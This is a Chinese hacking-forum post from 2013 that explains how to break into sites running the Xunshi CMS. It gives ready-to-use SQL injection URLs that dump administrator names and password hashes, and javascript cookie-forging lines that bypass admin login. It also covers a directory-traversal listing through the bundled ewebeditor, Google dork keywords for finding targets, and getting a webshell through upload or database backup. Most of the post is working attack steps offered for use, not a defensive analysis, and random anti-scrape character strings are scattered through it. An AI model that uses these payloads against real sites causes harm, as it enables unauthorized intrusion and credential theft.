找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3113|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘" }& b. H1 ^* M; e+ L3 h8 F! {

, ], [& j1 e' [在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
0 N" H) j! h% N* I6 @5 i2 @( }
9 Z3 c0 K  c" S* f以下本文总结来自黑防去年第9期杂志上的内容...3 S, x' x9 R; `( H9 N% B& p7 y5 c
: }( H) b. N2 g
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%8 H+ }, e6 J# g4 _+ |8 v
) V9 \' x! G' G4 L5 ?
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
* ?  D! V6 _3 x+ H5 C9 |8 y/ |- y& Q7 u
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况2 ^; X% z" |' a' k
这里一个注入. U# g. U3 m! K% X0 M0 R' Z$ T

" v1 ^; h5 Y+ f' i, M效果如图:
% A  p! I( D) ~& A8 f# t- C. h1 l# n$ p  G
0 E" U, k' J+ E6 k0 |, ^

' w  Q7 x" g4 I! g& f  y4 X# V这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.) b8 ?/ a; `. {/ ^" a+ g

5 z/ T2 t" o* e. ]# h1 _密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
' \' P; \0 {% G* D
: c3 B* {" P: E# U5 \9 X( R/ mjavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
) _- Q2 F, N4 E% V
  u' Y  [/ g+ ^那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:! R9 D$ I1 _/ I7 ]" D" `
" A) K, \7 v# |6 w# E
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
" l7 q0 L2 f( [  m8 Y. l
# z! S; P3 L% G5 ~) V6 B它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
* a0 h; X: P3 s0 F0 g0 b8 \
! T0 H. f! A. u2 y访问这页面来列目录..步骤如下:/ \" m0 V. D% I+ x8 }/ Y; b
' y" N8 v5 B% S/ d. }7 h5 d( _
javascript:alert(document.cookie="admindj=1")
6 L0 U2 H0 W# ~5 e6 g" [1 K. H% R' M- y/ m9 r/ q% _* x
http://www.political-security.co ... asp?id=46&dir=../..
8 c3 ]: t# d! u2 j  a: u1 E* N8 F, w! H
效果如图:0 O9 X4 B3 J( F' p

- `7 L. I. ?: b" n
3 V. B: U( e6 B! U" g  ~5 a# e) I8 l& T6 C( t. F4 D- ]/ I0 t
这样全站目录都能瞧了..找到后台目录..进去..8 {3 D3 L$ G$ M$ P: c9 F0 ~
' W1 K/ B2 i$ T- t" g
那么进了后台怎么拿shell??上传--备份就ok了../ h% K' e, x+ `

9 i- t  e# d7 M* ]那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
- _# E& W5 e8 z' N2 c
' G  Q# |4 A2 O3 i* o, ^1 D这个我也碰到过一次..你都可以通过列目录来实现..6 U" }9 h; U: ^, Q6 v. w

. I, d8 g! J; Z" a/ Ejavascript:alert(document.cookie="admindj=1") ) a3 w% @5 g! x+ g1 F5 X

2 j7 Z9 z4 m) S/ q% k+ Mhttp://www.political-security.co ... p?action=BackupData
# I  n" L7 D) ~" `$ X; Q( d1 z) q
备份ok..
7 g4 L1 w9 x9 t, t$ T  e# j$ G" F" _" [% L' \
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
  R' y) B: U4 \) H( h9 q% ?4 g
: J  d, J5 |; b3 e$ _$ z' v在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下! g! M5 R# l  Q$ J. q7 q

# W( o# v" q/ l. n$ g, T) s然后访问此页面进行注入..步骤如下:
- O) Z) N& m6 W. X! p/ y5 ~: r  i, [7 I) b4 t8 |
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")* ]- u4 o, V- ]7 ^% P4 D
' z( H$ |: {  u6 c8 t
然后请求admin/admin_chk.asp页面
1 ~% Z* h. z" M. H' Y9 V
* S' y+ N  D- o, \' t6 W/ t8 G输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%3 o  G1 T# f6 u( b9 U
1 q; p. w# ~) X% s4 {
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
! \" n9 d) F9 ^. ?- D3 C; O( l3 N6 ]4 P7 R/ X* f- W% @* P
效果如图所示:. Y: q9 M2 Q9 |  v
6 @# E6 g( t( e" b2 |
4 R7 b' _! R4 e" @
+ r3 S9 K3 O3 l0 `" g5 p# u$ P
讯时漏洞2
" G5 o2 ^3 |& F9 f7 c! pgoogle关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
6 V; w: n2 y- @7 N 5 M( V8 U' D" z) A( }
1、/admin/admin_news_pl_view.asp?id=13 K, _5 N& T: O2 ?/ s
//id任意 填入以下语句$ U. i9 _1 Q$ k3 ?5 M
! u0 Q7 T9 y, \; B5 K0 d6 r
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!) q( X- z  U$ p& T5 L- C% t! R1 L

) Y1 ^1 E3 L5 c% a$ q" t5 c$ {0 b! x/ A- w( ]+ d
, C( }  m) r1 R8 R5 b
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username=') i/ ?) v# D9 `. H3 y' S
" a4 l3 J* b  V+ M9 y
* M' d+ r' l" H) k

) J# Q- U( h+ w/ S5 d! s. Y* `爆出管理员帐号和密码了% Z8 ]7 C2 \* b3 U" t
( U2 P5 y. y- `6 y) G5 A9 g
: Y8 {. W. o" ^, k3 z: Y
. E/ `' w: f4 z5 Z
4、cookies进后台
( O, |! ?" I; n+ ? - C+ I' m  l  l3 }- |0 k
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));* m9 l* {0 ~! C# L
0 ?+ }2 {* I2 x3 L, `

1 l; v5 j7 V+ p; G9 \+ \! p. s9 B4 S1 v- G+ V5 q  C
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!1 C( y8 ?+ P8 T2 c+ w" Y7 U- d

, x  e* Z0 \9 z" T
" b, a; F$ v3 l; N3 F. Y, }8 C; a! E# T& Q9 S2 G
6、后台有上传和备份取SHELL不难。
' p" {, e* }8 W% B; y# Y& ^1 H : A  N$ H; q$ D8 U6 B
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..- m6 B2 o$ ?* @
5 A$ l3 X& d1 D( [+ \' Z5 c
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
# S) L  t: z4 k+ W
; v7 v( n$ B# n- g. `$ C2 P* T4 U: k. w- M1 f$ _
8 }$ f: J$ X$ k. {
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表